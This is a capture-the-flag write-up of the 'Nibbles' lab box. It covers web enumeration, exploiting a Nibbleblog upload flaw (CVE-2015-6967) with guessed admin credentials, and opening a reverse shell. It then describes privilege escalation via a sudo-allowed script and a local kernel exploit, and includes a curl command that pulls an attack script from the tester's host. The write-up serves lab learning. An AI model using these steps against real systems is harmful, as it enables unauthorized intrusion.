Nibbles (Linux) Write-up - LinEnum & How to call a bash shell with sudo priv
I've done this box a long time ago while following a TCM's video, but I decided to give it a go again with fresh perspective.
Nmap Scan Result:
Let's do web enumeration first.
Visiting the IP, I found the nibbleblog directory which took me to a blog site.
Started the gobuster from the directory:
gobuster dir -u http://10.129.168.232/nibbleblog/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
content/
/themes/
/admin
/plugins
README
languages
Version was found in:http://10.129.168.232/nibbleblog/README
Version: v4.0.3
Codename: Coffee Release date: 2014-04-01
Site: http://www.nibbleblog.com Blog: http://blog.nibbleblog.com Help & Support: http://forum.nibbleblog.com Documentation: http://docs.nibbleblog.com
Vuln:CVE-2015-6967
"Unrestricted file upload vulnerability in the My Image plugin in Nibbleblog before 4.0.5 allows remote administrators to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in content/private/plugins/my_image/image.php."
Found admin.php page and attempted login with Username:admin password: nibbles ---> successful
Found a directory where I can upload a reverse shell script.
Uploaded a reverse shell and got the shell back.
can't access tty though.
"bash -i" to make it interactive.
or python3 pty option
By typing sudo -l reveals that /home/nibbler/personal/stuff/monitor.sh can be ran as root without password
so I have unzipped the file (unzip personal.zip) and removed the current shell file.
Created a new file with vim:
We utilized the Sudo functionality to run a script to call the bash with root privilege.
Running Linux Exploit Suggester
host it on python simplehttp server and download it from the nibble server with
curl -o enum.sh IP/enum.sh
We'll try the RationalLove
Get the exploit and upload it again.
We need to compile the c file with gcc -o FILE_NAME Rationallove.c
For some reason, I had to execute it twice to get it work, but it worked!
Additional resources for this box:
Last updated